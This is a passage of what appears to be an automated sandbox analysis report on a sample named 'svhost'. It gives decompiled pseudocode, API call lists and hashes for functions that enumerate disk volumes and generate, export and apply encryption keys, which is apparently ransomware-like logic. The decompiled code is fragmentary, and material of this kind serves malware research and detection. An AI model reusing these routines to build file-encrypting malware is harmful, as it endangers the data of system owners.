                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                      • String ID: J]
                                      • API String ID: 215268677-2570422865
                                      • Opcode ID: c0c6913e0011d5b5886eee328e340262fbf713619b2d51270c84a8977a7e81c8
                                      • Instruction ID: 4dfbbbc65710880363208348c915822750c21232bb6c7ff0588648f08bd2be16
                                      • Opcode Fuzzy Hash: c0c6913e0011d5b5886eee328e340262fbf713619b2d51270c84a8977a7e81c8
                                      • Instruction Fuzzy Hash: 37114FB0D04249DEDF00DFE4D85ABFEBBB8AF04304F044498A609B7281CBB5460DDBA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00EA57EA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      C-Code - Quality: 25%
                                      			E00EA57EA(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t14;

				_v8 = _v8 & 0x00000000;
				_t8 =  &_v8;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t8, __ecx);
				if(_t8 != 0) {
					_t8 = GetProcAddress(_v8, "CorExitProcess");
					_t14 = _t8;
					if(_t14 != 0) {
						 *0xec4320(_a4);
						_t8 =  *_t14();
					}
				}
				if(_v8 != 0) {
					return FreeLibrary(_v8);
				}
				return _t8;
			}






                                      0x00ea57f0
                                      0x00ea57f4
                                      0x00ea57ff
                                      0x00ea5807
                                      0x00ea5812
                                      0x00ea5818
                                      0x00ea581c
                                      0x00ea5823
                                      0x00ea5829
                                      0x00ea5829
                                      0x00ea582b
                                      0x00ea5830
                                      0x00000000
                                      0x00ea5835
                                      0x00ea583c

                                      APIs
                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,00EA57DF,?,?,00EA57A7,00E62ABC,?,?), ref: 00EA57FF
                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00EA5812
                                      • FreeLibrary.KERNEL32(00000000,?,?,00EA57DF,?,?,00EA57A7,00E62ABC,?,?), ref: 00EA5835
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressFreeHandleLibraryModuleProc
                                      • String ID: CorExitProcess$mscoree.dll
                                      • API String ID: 4061214504-1276376045
                                      • Opcode ID: 3c450834625b33a0a1c8fa24cf83ea4fd8bd5709c62373f6ae085804986c7dac
                                      • Instruction ID: 79b9e750df09aa3a8633c2bfa4a20e20f21fd46a231fda2f97105d5bebadd4b2
                                      • Opcode Fuzzy Hash: 3c450834625b33a0a1c8fa24cf83ea4fd8bd5709c62373f6ae085804986c7dac
                                      • Instruction Fuzzy Hash: D0F0E272501208FBCB15AB62EC1AF9D7E78EB09726F000030B400B61B0CB758E05DB80
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00E89BDD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMONLIBRARYCODE
                                      Download Yara Rule
                                      C-Code - Quality: 50%
                                      			E00E89BDD(long _a4) {
				long _t3;
				intOrPtr* _t7;

				_t7 =  *0xef2e5c;
				if(_t7 == 0) {
					LeaveCriticalSection(0xef2e44);
					_t3 = WaitForSingleObjectEx( *0xef2e40, _a4, 0);
					EnterCriticalSection(0xef2e44);
					return _t3;
				}
				 *0xec4320(0xef2e3c, 0xef2e44, _a4);
				return  *_t7();
			}





                                      0x00e89be1
                                      0x00e89be9
                                      0x00e89c0a
                                      0x00e89c1b
                                      0x00e89c22
                                      0x00000000
                                      0x00e89c22
                                      0x00e89bfa
                                      0x00000000

                                      APIs
                                      • SleepConditionVariableCS.KERNELBASE(?,00E89B7A,00000064), ref: 00E89C00
                                      • LeaveCriticalSection.KERNEL32(00EF2E44,?,?,00E89B7A,00000064,?,?,?,00E52823,00EF3AB8), ref: 00E89C0A
                                      • WaitForSingleObjectEx.KERNEL32(?,00000000,?,00E89B7A,00000064,?,?,?,00E52823,00EF3AB8), ref: 00E89C1B
                                      • EnterCriticalSection.KERNEL32(00EF2E44,?,00E89B7A,00000064,?,?,?,00E52823,00EF3AB8), ref: 00E89C22
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                      • String ID: D.
                                      • API String ID: 3269011525-1603222338
                                      • Opcode ID: bd7d122046d0e6a8380c16936e92312699be3e68efef08a5dcbdff9ef3102e48
                                      • Instruction ID: 7e98d636c37cdb3dfef19eac9fbdc4f68191707afcfa4e6a2026947cc67727a2
                                      • Opcode Fuzzy Hash: bd7d122046d0e6a8380c16936e92312699be3e68efef08a5dcbdff9ef3102e48
                                      • Instruction Fuzzy Hash: 61E09B36A42228BFCB032B52EC15DAE7F38AB45711B155064F74972170C7620C0587C0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00E6C2A0 Relevance: 7.7, APIs: 5, Instructions: 170COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 81%
                                      			E00E6C2A0(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v16;
				signed int _v20;
				char _v540;
				short _v1060;
				char _v1064;
				char _v1076;
				char _v1100;
				char _v1124;
				char _v1148;
				intOrPtr* _v1152;
				short _v1154;
				signed int _v1160;
				intOrPtr _v1164;
				signed int _v1168;
				intOrPtr _v1172;
				intOrPtr _v1176;
				signed int _v1180;
				long _v1184;
				char _v1208;
				signed int _t77;
				signed int _t78;
				intOrPtr _t84;
				intOrPtr _t104;
				void* _t113;
				void* _t116;
				void* _t168;
				signed int _t169;
				void* _t170;
				void* _t172;

				_t168 = __esi;
				_t167 = __edi;
				_t116 = __ebx;
				_t77 =  *0xeef074; // 0x221cac15
				_t78 = _t77 ^ _t169;
				_v20 = _t78;
				 *[fs:0x0] =  &_v16;
				_v1172 = __ecx;
				E00E53840( &_v1064, _v1172);
				E00E515C0( &_v1076, 0xc);
				E00E566A0( &_v1076);
				_t84 = E00EA1270(__edi,  &_v540, 0, 0x208);
				_t172 = _t170 - 0x4a8 + 0xc;
				__imp__FindFirstVolumeW( &_v540, 0x104, _t78,  *[fs:0x0], 0xec1730, 0xffffffff);
				_v1164 = _t84;
				if(_v1164 != 0xffffffff) {
					do {
						_v1152 =  &_v540;
						_v1176 = _v1152 + 2;
						do {
							_v1154 =  *_v1152;
							_v1152 = _v1152 + 2;
						} while (_v1154 != 0);
						_v1180 = _v1152 - _v1176 >> 1;
						_v1160 = _v1180 - 1;
						if(( *(_t169 + 0xfffffffffffffde8) & 0x0000ffff) == 0x5c && ( *(_t169 + 0xbad995) & 0x0000ffff) == 0x5c && ( *(_t169 + 0xbad995) & 0x0000ffff) == 0x3f && ( *(_t169 + 0xfffffffffffffdee) & 0x0000ffff) == 0x5c && ( *(_t169 + _v1160 * 2 - 0x218) & 0x0000ffff) == 0x5c) {
							goto L9;
						}
						break;
						L9:
						_v1168 = _v1160 << 1;
						__eflags = _v1168 - 0x208;
						if(_v1168 >= 0x208) {
							E00E89FFE();
						}
						asm("lfence");
						 *((short*)(_t169 + _v1168 - 0x218)) = 0;
						E00EA1270(_t167,  &_v1060, 0, 0x208);
						_t172 = _t172 + 0xc;
						_v1184 = QueryDosDeviceW(_t169 + 0xbad995,  &_v1060, 0x104);
						 *(_t169 + _v1160 * 2 - 0x218) = 0x5c;
						__eflags = _v1184;
						if(_v1184 >= 0) {
							E00E6C740( &_v1148);
							E00E6CB40( &_v1148,  &_v1060);
							E00E6CB40( &_v1124,  &_v540);
							E00E57B60( &_v1100, E00E6C590(_t116,  &_v1064, _t167, _t168, __eflags,  &_v1208,  &_v540));
							E00E57B40( &_v1208);
							_t113 = E00E51650( &_v1148);
							_t172 = _t172 + 4;
							E00E6C660( &_v1076, _t113);
							E00E6C270( &_v1148);
						}
						_t104 = _v1164;
						__imp__FindNextVolumeW(_t104,  &_v540, 0x104);
						__eflags = _t104;
					} while (_t104 != 0);
					__imp__FindVolumeClose(_v1164);
				}
				E00E57460(_a4, E00E51650( &_v1076));
				E00E6CAA0( &_v1076);
				 *[fs:0x0] = _v16;
				return E00E89A35(_t116, _v20 ^ _t169,  &_v1076, _t167, _t168);
			}
































                                      0x00e6c2a0
                                      0x00e6c2a0
                                      0x00e6c2a0
                                      0x00e6c2b7
                                      0x00e6c2bc
                                      0x00e6c2be
                                      0x00e6c2c5
                                      0x00e6c2cb
                                      0x00e6c2de
                                      0x00e6c2eb
                                      0x00e6c2f6
                                      0x00e6c309
                                      0x00e6c30e
                                      0x00e6c31d
                                      0x00e6c323
                                      0x00e6c330
                                      0x00e6c336
                                      0x00e6c33c
                                      0x00e6c34b
                                      0x00e6c351
                                      0x00e6c35a
                                      0x00e6c361
                                      0x00e6c368
                                      0x00e6c380
                                      0x00e6c38f
                                      0x00e6c3a8
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00e6c400
                                      0x00e6c408
                                      0x00e6c40e
                                      0x00e6c418
                                      0x00e6c41c
                                      0x00e6c41c
                                      0x00e6c421
                                      0x00e6c42c
                                      0x00e6c442
                                      0x00e6c447
                                      0x00e6c46c
                                      0x00e6c47d
                                      0x00e6c485
                                      0x00e6c48c
                                      0x00e6c498
                                      0x00e6c4aa
                                      0x00e6c4bc
                                      0x00e6c4e1
                                      0x00e6c4ec
                                      0x00e6c4f8
                                      0x00e6c4fd
                                      0x00e6c507
                                      0x00e6c512
                                      0x00e6c512
                                      0x00e6c523
                                      0x00e6c52a
                                      0x00e6c530
                                      0x00e6c530
                                      0x00e6c53f
                                      0x00e6c53f
                                      0x00e6c558
                                      0x00e6c563
                                      0x00e6c56e
                                      0x00e6c583

                                      APIs
                                      • FindFirstVolumeW.KERNEL32(?,00000104,0000000C,?,221CAC15), ref: 00E6C31D
                                      • QueryDosDeviceW.KERNEL32(?,?,00000104), ref: 00E6C466
                                      • task.LIBCPMTD ref: 00E6C4EC
                                      • FindNextVolumeW.KERNEL32(000000FF,?,00000104), ref: 00E6C52A
                                      • FindVolumeClose.KERNEL32(000000FF), ref: 00E6C53F
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FindVolume$CloseDeviceFirstNextQuerytask
                                      • String ID:
                                      • API String ID: 782275671-0
                                      • Opcode ID: e546f28bb4f2b64f7d50223023474dc22f0ab9d58c6fa6ed6d5ce996eefd01dc
                                      • Instruction ID: 7217beb6b70ebba57b9007eb388aeb6ee7aaaf275c016ccd47db5e1180fc6c7f
                                      • Opcode Fuzzy Hash: e546f28bb4f2b64f7d50223023474dc22f0ab9d58c6fa6ed6d5ce996eefd01dc
                                      • Instruction Fuzzy Hash: DB71A1B09401288ACB24DF24DC95BEDB3B4AB58304F5056E9E65EB6291EF305E89CF58
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00E65E90 Relevance: 7.7, APIs: 5, Instructions: 168COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 83%
                                      			E00E65E90(void* __ebx, signed int __ecx, void* __edi, void* __esi) {
				char _v16;
				signed int _v20;
				char _v44;
				char _v68;
				signed int _v72;
				char _v73;
				signed int _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v116;
				signed int _t62;
				signed int _t63;
				void* _t76;
				signed char _t77;
				void* _t81;
				signed char _t82;
				signed char _t95;
				signed int _t147;

				_t146 = __esi;
				_t145 = __edi;
				_t103 = __ebx;
				_push(0xffffffff);
				_push(0xec1030);
				_push( *[fs:0x0]);
				_t62 =  *0xeef074; // 0x221cac15
				_t63 = _t62 ^ _t147;
				_v20 = _t63;
				_push(_t63);
				 *[fs:0x0] =  &_v16;
				_v72 = __ecx;
				if((E00E66090(_v72, _v72 + 0x10) & 0x000000ff) == 0) {
					L11:
					__eflags = 0;
				} else {
					_v80 = E00E66150(_v72,  *(_v72 + 0x10));
					_t139 = _v72;
					_v84 = E00E660F0(_v72,  *(_v72 + 4), 1, _v80);
					if(_v80 <= 0) {
						goto L11;
					} else {
						_t157 = _v84;
						if(_v84 <= 0) {
							goto L11;
						} else {
							asm("lfence");
							E00E66310(__ebx,  &_v68, __edi, __esi, _t157, _v84, 0);
							_t76 = E00E51650( &_v68);
							_t139 =  *(_v72 + 0x10);
							_t77 = E00E66210(_v72, _t157,  *(_v72 + 0x10), _t76, _v80);
							_t158 = _t77 & 0x000000ff;
							if((_t77 & 0x000000ff) == 0) {
								L10:
								E00E57F50( &_v68);
								goto L11;
							} else {
								asm("lfence");
								_t81 = E00E51650( &_v68);
								_t139 =  *(_v72 + 4);
								_t82 = E00E661A0(_v72, _t158,  *(_v72 + 4), 1, _t81, _v80, _v84);
								_t159 = _t82 & 0x000000ff;
								if((_t82 & 0x000000ff) == 0) {
									goto L10;
								} else {
									asm("lfence");
									E00E61BB0(__ebx, 0xef3ac0, _t139, __edi, __esi, _t159,  &_v44, E00E51650(E00E62280(0xef3ac0)));
									_v92 = E00E57A20( &_v44);
									_t139 = _v80;
									_v88 = E00E660F0(_v72,  *(_v72 + 4), 1, _v80);
									if(_v92 <= 0) {
										L9:
										E00E57F50( &_v44);
										goto L10;
									} else {
										_t161 = _v88;
										if(_v88 <= 0) {
											goto L9;
										} else {
											asm("lfence");
											E00E66280(__ebx,  &_v44, __edi, __esi, _v88, 0);
											_t95 = E00E661A0(_v72, _t161,  *(_v72 + 4), 1, E00E51650( &_v44), _v92, _v88);
											_t139 = _t95 & 0x000000ff;
											if((_t95 & 0x000000ff) == 0) {
												goto L9;
											} else {
												asm("lfence");
												_t139 =  &_v116;
												E00E662D0(_v72 + 0x14, E00E666A0(__ebx, __edi,  &_v116,  &_v68,  &_v44));
												E00E57F50( &_v116);
												_v73 = 1;
												E00E57F50( &_v44);
												E00E57F50( &_v68);
											}
										}
									}
								}
							}
						}
					}
				}
				 *[fs:0x0] = _v16;
				return E00E89A35(_t103, _v20 ^ _t147, _t139, _t145, _t146);
			}






















                                      0x00e65e90
                                      0x00e65e90
                                      0x00e65e90
                                      0x00e65e93
                                      0x00e65e95
                                      0x00e65ea0
                                      0x00e65ea4
                                      0x00e65ea9
                                      0x00e65eab
                                      0x00e65eae
                                      0x00e65eb2
                                      0x00e65eb8
                                      0x00e65ecf
                                      0x00e66071
                                      0x00e66071
                                      0x00e65ed5
                                      0x00e65ee4
                                      0x00e65eed
                                      0x00e65efc
                                      0x00e65f03
                                      0x00000000
                                      0x00e65f09
                                      0x00e65f09
                                      0x00e65f0d
                                      0x00000000
                                      0x00e65f13
                                      0x00e65f13
                                      0x00e65f1f
                                      0x00e65f2c
                                      0x00e65f38
                                      0x00e65f3f
                                      0x00e65f47
                                      0x00e65f49
                                      0x00e66069
                                      0x00e6606c
                                      0x00000000
                                      0x00e65f4f
                                      0x00e65f4f
                                      0x00e65f5e
                                      0x00e65f6c
                                      0x00e65f73
                                      0x00e65f7b
                                      0x00e65f7d
                                      0x00000000
                                      0x00e65f83
                                      0x00e65f83
                                      0x00e65fa3
                                      0x00e65fb0
                                      0x00e65fb3
                                      0x00e65fc8
                                      0x00e65fcf
                                      0x00e66061
                                      0x00e66064
                                      0x00000000
                                      0x00e65fd5
                                      0x00e65fd5
                                      0x00e65fd9
                                      0x00000000
                                      0x00e65fdf
                                      0x00e65fdf
                                      0x00e65feb
                                      0x00e66011
                                      0x00e66016
                                      0x00e6601b
                                      0x00000000
                                      0x00e6601d
                                      0x00e6601d
                                      0x00e66028
                                      0x00e6603b
                                      0x00e66043
                                      0x00e66048
                                      0x00e6604f
                                      0x00e66057
                                      0x00e6605c
                                      0x00e6601b
                                      0x00e65fd9
                                      0x00e65fcf
                                      0x00e65f7d
                                      0x00e65f49
                                      0x00e65f0d
                                      0x00e65f03
                                      0x00e66076
                                      0x00e6608b

                                      APIs
                                        • Part of subcall function 00E66090: CryptGenKey.ADVAPI32(?,00006610,00000001,?,?,221CAC15), ref: 00E660AB
                                        • Part of subcall function 00E66150: CryptExportKey.ADVAPI32(00000000,00000000,00000008,00000000,00000000,00000000,?), ref: 00E6617A
                                        • Part of subcall function 00E660F0: CryptEncrypt.ADVAPI32(?,00000000,?,00000000,00000000,?,00000000,?,?,221CAC15), ref: 00E6611E
                                        • Part of subcall function 00E66210: CryptExportKey.ADVAPI32(?,00000000,00000008,00000000,00000000,00000000,?,221CAC15,?,00000000,221CAC15), ref: 00E66251
                                      • task.LIBCPMTD ref: 00E6606C
                                        • Part of subcall function 00E661A0: CryptEncrypt.ADVAPI32(00000001,00000000,221CAC15,00000000,00000000,00000000,?,?,221CAC15,00000001,00000000,00000000,221CAC15), ref: 00E661E8
                                      • task.LIBCPMTD ref: 00E66064
                                        • Part of subcall function 00E666A0: task.LIBCPMTD ref: 00E66733
                                      • task.LIBCPMTD ref: 00E66043
                                      • task.LIBCPMTD ref: 00E6604F
                                      • task.LIBCPMTD ref: 00E66057
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: task$Crypt$EncryptExport
                                      • String ID:
                                      • API String ID: 2898288894-0
                                      • Opcode ID: dd577f89a737769834d684c2a92ae56f69c368b7ea352a61a4815385adb31f21
                                      • Instruction ID: bb5bd108f7650b12978686498d2e66382a7f4502705d9a3bd4b45e984df0718f
                                      • Opcode Fuzzy Hash: dd577f89a737769834d684c2a92ae56f69c368b7ea352a61a4815385adb31f21
                                      • Instruction Fuzzy Hash: C4514D71E501089FDB14EBE4D851EEEB7B9BF48344F145169E506BB282DA31AD06CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00E54800 Relevance: 7.6, APIs: 5, Instructions: 91COMMONLIBRARYCODE
                                      Download Yara Rule
                                      C-Code - Quality: 91%
                                      			E00E54800(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				char _v16;
				signed int _v20;
				char _v28;
				intOrPtr _v32;
				intOrPtr* _v36;
				intOrPtr* _v40;
				intOrPtr _v44;
				signed int _t35;
				signed int _t36;
				void* _t55;
				void* _t58;
				void* _t85;
				void* _t86;
				signed int _t87;

				_t86 = __esi;
				_t85 = __edi;
				_t58 = __ebx;
				_t35 =  *0xeef074; // 0x221cac15
				_t36 = _t35 ^ _t87;
				_v20 = _t36;
				 *[fs:0x0] =  &_v16;
				_v32 = __ecx;
				E00E515C0( &_v28, 8);
				 *((intOrPtr*)( *((intOrPtr*)( *_a4 + 8))))( &_v28, _t36,  *[fs:0x0], 0xec02b8, 0xffffffff);
				_v8 = 0;
				if((E00E54650(_v32) & 0x000000ff) == 0) {
					L6:
					_t83 = _a4;
					E00E54920(_t58, E00E5A440( &_v28), _t85, _t86, _a4);
					_v8 = 0xffffffff;
					E00E56EC0();
				} else {
					_t83 = _a4;
					if(( *(_a4 + 0x10) & 0x000000ff) != 0) {
						goto L6;
					} else {
						if((E00E54680(_v32) & 0x000000ff) == 0) {
							E00E542D0(E00E5A440( &_v28), 1);
						} else {
							_t55 = E00E546A0(_v32);
							E00E54300(E00E5A440( &_v28), _t55, 1);
						}
						_v40 = _a4;
						_v36 = _v40;
						if(_v36 == 0) {
							_v44 = 0;
						} else {
							_t83 =  *((intOrPtr*)( *_v36));
							_v44 =  *((intOrPtr*)( *((intOrPtr*)( *_v36))))(1);
						}
						_v8 = 0xffffffff;
						E00E56EC0();
					}
				}
				 *[fs:0x0] = _v16;
				return E00E89A35(_t58, _v20 ^ _t87, _t83, _t85, _t86);
			}


















                                      0x00e54800
                                      0x00e54800
                                      0x00e54800
                                      0x00e54814
                                      0x00e54819
                                      0x00e5481b
                                      0x00e54822
                                      0x00e54828
                                      0x00e54830
                                      0x00e54844
                                      0x00e54846
                                      0x00e5485a
                                      0x00e548a5
                                      0x00e548a5
                                      0x00e548b3
                                      0x00e548b8
                                      0x00e548c2
                                      0x00e5485c
                                      0x00e5485c
                                      0x00e54865
                                      0x00000000
                                      0x00e54867
                                      0x00e54874
                                      0x00e5489e
                                      0x00e54876
                                      0x00e5487b
                                      0x00e5488b
                                      0x00e5488b
                                      0x00e548cc
                                      0x00e548d2
                                      0x00e548d9
                                      0x00e548ee
                                      0x00e548db
                                      0x00e548e5
                                      0x00e548e9
                                      0x00e548e9
                                      0x00e548f5
                                      0x00e548ff
                                      0x00e548ff
                                      0x00e54865
                                      0x00e54907
                                      0x00e5491c

                                      APIs
                                      • Concurrency::details::_Task_impl_base::_IsCanceled.LIBCPMTD ref: 00E54850
                                      • Concurrency::details::_Task_impl_base::_CancelWithExceptionHolder.LIBCPMTD ref: 00E5488B
                                      • Concurrency::details::_Task_impl_base::_Cancel.LIBCPMTD ref: 00E5489E
                                      • std::_Container_base12::~_Container_base12.LIBCPMTD ref: 00E548C2
                                      • std::_Container_base12::~_Container_base12.LIBCPMTD ref: 00E548FF
                                        • Part of subcall function 00E54680: Concurrency::details::ScheduleGroupSegmentBase::HasUnrealizedChores.LIBCMTD ref: 00E5468D
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Concurrency::details::_Task_impl_base::_$CancelContainer_base12Container_base12::~_std::_$Base::CanceledChoresConcurrency::details::ExceptionGroupHolderScheduleSegmentUnrealizedWith
                                      • String ID:
                                      • API String ID: 1606484955-0
                                      • Opcode ID: 1414a6531dd41b4644d3267cb15a7b4b229f246cf3c7b611050e925943a3328b
                                      • Instruction ID: 24709b3a72661ac84663f40f515c15a91bd67aea3ed7d983a5cabbb8ef9c4821
                                      • Opcode Fuzzy Hash: 1414a6531dd41b4644d3267cb15a7b4b229f246cf3c7b611050e925943a3328b
                                      • Instruction Fuzzy Hash: AF316DB0A00209DBCB08EFA0C851BFEB7F1BF44315F105A29E9167B2D1DB746989CB80
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00E52E10 Relevance: 7.6, APIs: 5, Instructions: 63COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 84%
                                      			E00E52E10(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags, signed int _a4) {
				signed int _v8;
				char _v16;
				signed int _v20;
				char _v24;
				signed int _v25;
				intOrPtr _v32;
				signed int _t25;
				signed int _t26;
				signed char _t31;
				void* _t41;
				void* _t60;
				void* _t61;
				signed int _t62;

				_t61 = __esi;
				_t60 = __edi;
				_t41 = __ebx;
				_push(0xffffffff);
				_push(0xebfee8);
				_push( *[fs:0x0]);
				_t25 =  *0xeef074; // 0x221cac15
				_t26 = _t25 ^ _t62;
				_v20 = _t26;
				_push(_t26);
				 *[fs:0x0] =  &_v16;
				_v32 = __ecx;
				E00E57720(_a4 + 8, 0);
				E00E528F0(_a4);
				 *((intOrPtr*)(_a4 + 0x68)) = _v32;
				_v25 = 1;
				_t31 = E00E52DE0(_v32);
				_t59 = _t31 & 0x000000ff;
				if((_t31 & 0x000000ff) == 0) {
					E00E57780( &_v24, _v32 + 0xc);
					_v8 = 0;
					if((E00E52DE0(_v32) & 0x000000ff) == 0) {
						_v25 = 0;
						_t59 = _a4;
						E00E52C70(_v32 + 0x3c, _a4, _v32 + 0x3c, _a4);
					}
					_v8 = 0xffffffff;
					E00E57740();
				}
				_t69 = _v25 & 0x000000ff;
				if((_v25 & 0x000000ff) != 0) {
					E00E52AD0(_t41, _a4, _t60, _t61, _t69);
				}
				 *[fs:0x0] = _v16;
				return E00E89A35(_t41, _v20 ^ _t62, _t59, _t60, _t61);
			}
















                                      0x00e52e10
                                      0x00e52e10
                                      0x00e52e10
                                      0x00e52e13
                                      0x00e52e15
                                      0x00e52e20
                                      0x00e52e24
                                      0x00e52e29
                                      0x00e52e2b
                                      0x00e52e2e
                                      0x00e52e32
                                      0x00e52e38
                                      0x00e52e43
                                      0x00e52e4b
                                      0x00e52e56
                                      0x00e52e59
                                      0x00e52e60
                                      0x00e52e65
                                      0x00e52e6a
                                      0x00e52e76
                                      0x00e52e7b
                                      0x00e52e8f
                                      0x00e52e91
                                      0x00e52e95
                                      0x00e52e9f
                                      0x00e52e9f
                                      0x00e52ea4
